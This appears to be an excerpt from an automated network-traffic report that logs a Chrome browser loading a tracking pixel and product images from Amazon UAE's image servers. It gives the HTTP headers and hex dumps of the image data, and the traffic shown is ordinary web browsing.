                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:29 GMT
                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                Content-Length: 43
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                x-amzn-RequestId: fde7e8a5-2825-4661-9593-1a0705165c25
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                69192.168.2.449918151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2170
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: e642ed37-6866-4bd4-b0d8-3e5393c23c98
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 26 Apr 2044 08:00:37 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:30 GMT
                                                                                                                                                                                                                                                                Age: 960584
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200139-IAD, cache-nyc-kteb1890082-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 95 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 01 06 07 08 02 03 04 09 10 00 02 02 01 03 00 05 07 08 07 09 01 00 00 00 00 00 01 02 03 04 05 11 12 06 21 31 41 71 13 23 32 51 61 a1 b1 07 22 52 72 74 91 92 c1 14 33 43 63 83 b3
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1Aq#2Qa"Rrt3Cc
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC792INData Raw: 61 f1 68 85 d1 75 1b 30 32 a8 b6 88 b7 64 65 5e dc 64 e1 27 bc 54 78 ee 9c 5a e4 9b 5d ab 7d c9 1c e7 be 3d de 0b e2 88 ba 35 2d 43 c8 c3 1f 1e fb b8 26 b6 a6 13 92 8e ef e8 a4 fb 77 ee db bc 86 93 5c 99 e3 bb 9b 4e 3b 97 75 39 51 cc b3 58 b5 51 3a 9c b4 db 5b 73 f4 ac 7c eb de 6d 7a e5 eb 2d cd 26 7b ab d7 b6 af eb 24 f4 e5 94 b1 f3 6c c9 b3 79 3c 5c b8 70 94 f7 ba 3c 55 73 6e 50 7b cd 46 5c 96 d2 7d ad 49 2e c6 44 69 1f b6 fe 1f f5 93 29 2d 24 46 5c 95 75 57 7d df 2c b9 34 3b 7c 96 a7 85 2f df d6 bf 13 e1 f9 9b 05 89 73 85 d8 9f 6a c4 f7 df 5a 35 bb 1e cf 25 93 4c fe 85 d5 3f c3 24 cd 87 a6 69 df 88 bf ce 61 ff 00 f4 56 32 7d 75 f8 cd 71 e4 8c f0 ca 15 7d ac a1 4d 2c 80 00 00 00 00 00 00 00 00 00 00 00 00 00 0a f6 ee bd 8f e0 50 12 9e 9a 64 35 b4 d1 f3
                                                                                                                                                                                                                                                                Data Ascii: ahu02de^d'TxZ]}=5-C&w\N;u9QXQ:[s|mz-&{$ly<\p<UsnP{F\}I.Di)-$F\uW},4;|/sjZ5%L?$iaV2}uq}M,Pd5


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                70192.168.2.449919151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 1912
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 05904073-7c1d-4d18-883c-b1593291b8ba
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 15 Jul 2044 14:45:00 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1982310
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:30 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200037-IAD, cache-ewr18174-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 91 00 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 05 06 01 04 02 03 07 08 10 00 02 01 03 03 01 06 03 05 06 07 00 00 00 00 00 00 01 02 03 04 11 05 12 21 31 06 13 22 41 51 71 07 32 61 43 62 72 81 91 23 33 34 42 a1 d2 14 16 52 63 b1
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQq2aCbr#34BRc
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC534INData Raw: 68 bb ba ea e2 0d 3d fe 2c b5 19 74 5b 73 18 b7 1e 63 8e 8d 9d 55 35 5b 6a 92 8b 70 92 f1 71 89 74 e1 e0 b5 4f b1 1a 44 ba 5b 6c fc 15 6a 43 fa 29 a4 68 55 f8 7d a7 cf e4 9d 78 7b 55 4f a7 e2 8c 8c ef 1f 17 07 05 a2 6f 3b 34 46 a5 0e e2 a9 34 ee 96 45 eb f9 dd 90 3d 86 6e ae ad ab d5 4f 11 6e 49 53 f4 8a ee f6 3c f4 e7 93 d5 88 5d 17 41 a1 a3 c6 aa a2 e5 39 54 96 65 39 b4 e4 d2 ce d8 f0 a2 b1 1c 93 46 6a b5 14 e7 75 f8 21 56 aa 9d 47 28 ec 00 05 65 60 00 00 00 00 00 00 15 9e da 6b 53 d0 f4 8b fb da 79 df 0a 78 84 92 ce c9 54 6a 9a 9b f4 50 72 dc 7c 4b 18 39 4d 26 7d ff 00 28 a9 a9 46 49 35 24 d3 8b 59 4d 3e 1a 69 f0 d3 5d 51 e4 1a d7 c1 9d 36 f2 a3 ad 61 56 56 6d f5 82 8f 7d 47 f2 83 71 71 f6 52 3d 4e 9f d5 28 e1 e3 28 54 e7 5b 98 b1 58 2a 95 5a 94 49 3f
                                                                                                                                                                                                                                                                Data Ascii: h=,t[scU5[jpqtOD[ljC)hU}x{UOo;4F4E=nOnIS<]A9Te9Fju!VG(e`kSyxTjPr|K9M&}(FI5$YM>i]Q6aVVm}GqqR=N((T[X*ZI?


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                71192.168.2.449923151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 1685
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 29b0ac12-468b-412f-b0ea-83cb63db53bb
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 26 Apr 2044 08:00:37 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1734773
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:30 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100032-IAD, cache-nyc-kteb1890080-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8e 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 07 03 04 06 01 02 08 10 00 02 02 01 02 04 03 06 05 04 03 00 00 00 00 00 00 01 02 03 04 05 11 06 12 21 31 13 32 51 07 41 42 61 71 91 14 22 52 81 a2 16 a1 b1 b2 62 92 93 01 01 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!12QABaq"Rb
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC307INData Raw: fb 2d 96 ed bd b7 6c cf c3 f1 0c 25 2b 23 37 d1 b6 cd 7e 6f 87 25 e4 aa 75 f4 92 4a 27 e9 58 da 98 73 df b1 43 4f 88 b5 96 b9 56 7c 63 f3 58 90 e6 ff 00 6d 8d 0b de 56 a0 9c 72 b2 ef c8 4f e0 e7 75 57 ff 00 58 6c ff 00 91 9d 2e 56 88 ad ec c2 8f 0d 91 2e 8c f8 d7 f5 17 ab 71 9d 37 e9 f3 53 5a 6e 2a af c4 5d 60 ad 9b b3 9d 27 d9 b5 1b 0b bf 0a 17 c6 11 f1 67 bb 2b 9e 12 e1 b7 8f 64 67 e1 aa e1 1f 2c 22 94 62 be 89 16 a9 c9 72 59 ea fb dc 91 d5 e0 61 7a 14 46 00 00 6b 8c e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ad 2c 3a a5 2e 77 15 b9 b2 0f 53 68 f3 47 89 24 b6 23 f2 34 aa 32 3a ce 24 88 0a 6d 3d a0 e2 9f 46 73 df d3 58 bb f9 4d ea 34 8c 7a 3c b0 44 98 24 ef 9b ee c8 aa 60 bb 23 c8 c5 47 a2 3d 00 81 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: -l%+#7~o%uJ'XsCOV|cXmVrOuWXl.V.q7SZn*]`'g+dg,"brYazFk,:.wShG$#42:$m=FsXM4z<D$`#G=0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                72192.168.2.449925151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621419_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 5960
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: e8f98a00-7d00-487a-822f-f9d6889248fd
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 01 Apr 2044 20:01:54 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1324281
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:30 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000143-IAD, cache-ewr18143-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a1 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 10 00 02 01 03 03 03 02 03 04 07 06 06 03 00 00 00 01 02 03 00 04 11 05 12 21 13 22 31 06 41 14 51 61 07 15 23 71 24 32 62 91 92 a1 d1 33 34 53 63 81 d2 16
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQa#q$2b34Sc
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: dc c7 9c 80 30 7c 66 9b a7 69 5a c5 d2 d9 c8 23 b8 68 8c 81 d4 19 4e fd aa 61 56 6c c8 41 1d 4c b3 22 b7 cd ca 80 9c d3 50 d4 2f 13 61 8a 19 43 4e d2 b3 c0 f1 96 e4 4b b2 14 45 65 56 03 08 14 05 c9 dc c5 be 44 7c bc 5c 29 04 0c bc 6f 7b 5d 7b ec 36 22 d6 fc ad b9 22 a9 96 5e ce f1 bc 6d be c4 1e 7f 0a e9 7c 8a d1 ba d9 90 09 91 21 3e 43 49 80 11 15 41 c8 21 48 1b b0 46 71 5e ee ac e2 91 51 22 8f a8 e1 76 2a 73 03 ed 04 a0 66 2b e4 29 53 ce 31 82 72 0d 4c 5d fa 68 c3 26 23 6c ed 3c 1c 06 0b c6 de 14 e5 7c 71 e3 3f b9 6b 36 8b 68 2c 66 fc 45 da a5 c1 67 25 4a 6d 5f 19 27 bb 8e 49 f6 ae e6 e1 a9 29 4c 31 c7 3d c6 6b 8b 68 e3 9f 47 66 d6 f6 00 69 f0 b3 e9 b1 96 cd 23 8c 91 58 ec 7a 69 b5 bd 49 55 f8 fd 31 76 ee 77 a1 55 c9 ee e1 9b f9 76 e4 8e 4e 2a c7 6d a5
                                                                                                                                                                                                                                                                Data Ascii: 0|fiZ#hNaVlAL"P/aCNKEeVD|\)o{]{6""^m|!>CIA!HFq^Q"v*sf+)S1rL]h&#l<|q?k6h,fEg%Jm_'I)L1=khGfi#XziIU1vwUvN*m
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: c0 7d 76 92 41 e2 a8 57 b0 96 43 6d 83 81 3f 95 e3 a5 63 18 e2 fd b6 5c b2 0d 5d 03 ba e9 97 8b 78 e2 6c f4 d1 30 0c 6c 98 8f 69 21 4b 30 c9 dc 1b 03 cb 60 54 96 b0 b2 58 da d9 47 3c a1 a4 b8 b8 8d 49 32 17 50 48 69 30 a7 ce 0b 63 20 6d fa 72 49 af 0d 6d a8 2f c3 dc ce dd c6 35 ea 00 a1 8a 0e 18 a0 52 b9 e4 9c b9 1e 07 01 49 c9 1e 2e ae e4 b2 9e cf 52 bc 61 75 02 98 c1 01 02 c8 00 60 e7 c3 72 d2 28 24 11 8e e5 19 c6 45 53 7d 9c ec cc 03 af b8 55 e6 ae 0f 6b 29 5b 6e c8 1c e3 40 0e ab b0 69 1a 65 96 96 75 1b 6d 32 27 b9 d4 6c 2d a2 ea c3 23 14 49 5a e1 04 91 ed 7c e3 e9 b7 72 2b 7d 36 f1 ab ae d9 c3 65 64 f7 32 bf c3 18 e3 b6 33 d9 ae d9 9a dc 4d 85 23 00 30 65 47 24 01 c2 b0 5a 90 6d 7f 56 bd 87 e2 34 3b 88 2e e0 91 cf 66 7a 53 42 a7 3c 29 7c c6 59 49 53
                                                                                                                                                                                                                                                                Data Ascii: }vAWCm?c\]xl0li!K0`TXG<I2PHi0c mrIm/5RI.Rau`r($ES}Uk)[n@ieum2'l-#IZ|r+}6ed23M#0eG$ZmV4;.fzSB<)|YIS
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: 42 90 cf 52 d1 0b 49 9a fa 9f f1 e9 65 f4 b4 8c c9 00 b9 19 74 23 6f 75 cc b5 fb f4 8d 05 98 b4 2c d1 19 63 67 6e dd a8 48 ee 8c a1 df c0 5d c1 3b 3b 8b 06 e0 73 8b d3 6b 3e a1 79 75 f7 5d b4 45 09 b6 58 6e 58 31 8d 59 8a a0 49 4c 69 21 c1 66 04 a8 5c 2f 0e e5 41 04 d6 b5 5f 51 4d 75 6f f0 77 46 3d f3 33 33 98 d0 4a e8 49 ea 96 d8 c2 39 58 ab 64 04 76 1b 31 b7 18 35 b3 a7 fa b9 a2 8e 68 e6 76 45 93 83 d0 77 88 38 60 81 99 67 07 b7 aa 14 09 43 9c f3 bb 00 86 27 ea 23 a5 cb 13 58 fd 7a ae 59 4b 06 47 c2 05 9a 7b df 1b 0f 45 7c 55 9a 16 84 5f c3 1e 73 72 8f d1 90 cc b2 b4 04 40 f0 ba 81 d9 22 33 85 c8 27 77 1b 6a 4f 43 bd 92 d6 79 9a 4d db a3 b4 04 21 8d 93 7a a3 c5 1f 2c 40 42 c0 92 36 82 c1 19 f1 9a a0 6a 3e b2 bb f5 0c 11 25 be e5 42 85 63 71 33 99 14 c0
                                                                                                                                                                                                                                                                Data Ascii: BRIet#ou,cgnH];;sk>yu]EXnX1YILi!f\/A_QMuowF=33JI9Xdv15hvEw8`gC'#XzYKG{E|U_sr@"3'wjOCyM!z,@B6j>%Bcq3
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC448INData Raw: 0a 17 36 03 99 c2 f9 97 cb 71 eb 97 17 f3 aa cb 2c 91 7f 99 26 41 03 3e 42 02 14 ed 3f 41 5d e6 01 0d 85 9d bb ee 96 e0 c8 70 f2 4d 71 23 b2 95 1c 82 43 05 50 31 85 0a 14 7b d6 0b af 4c 15 94 18 a1 84 0f a5 9d bf ff 00 71 1a 97 b6 d1 ee 23 5c 02 00 f9 08 62 51 c7 1e 02 62 ad 57 d2 4d 5b 92 ee d0 6a b8 a5 95 f0 3d f9 ec 5a 7a 0b 28 95 bf 92 e9 92 18 a4 78 f7 9e 43 39 bc 8f 81 9e e8 e5 de 76 fc f6 bc 66 b3 3b dd 24 21 2e ec cc b0 9f f0 94 5d 45 f9 bd 9b b0 b8 8b e8 b1 3c d8 a9 af bb 6e 7e 63 fe 94 7f ed a7 dd d7 3f 31 ff 00 4a 3f f6 55 41 82 4e dd 1a 46 5f 30 55 b3 59 11 b1 b1 05 41 db 5f d9 0c c7 05 ca c6 c4 1f c2 37 2d 13 0c fb 18 2e 00 64 1f 40 05 48 d8 eb ca b1 c0 8b be 54 56 90 f5 62 2a 4f 32 45 28 55 cb e0 73 11 57 19 e3 20 8c f2 2b 6e 5d 3a ea 41 b5
                                                                                                                                                                                                                                                                Data Ascii: 6q,&A>B?A]pMq#CP1{Lq#\bQbWM[j=Zz(xC9vf;$!.]E<n~c?1J?UANF_0UYA_7-.d@HTVb*O2E(UsW +n]:A


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
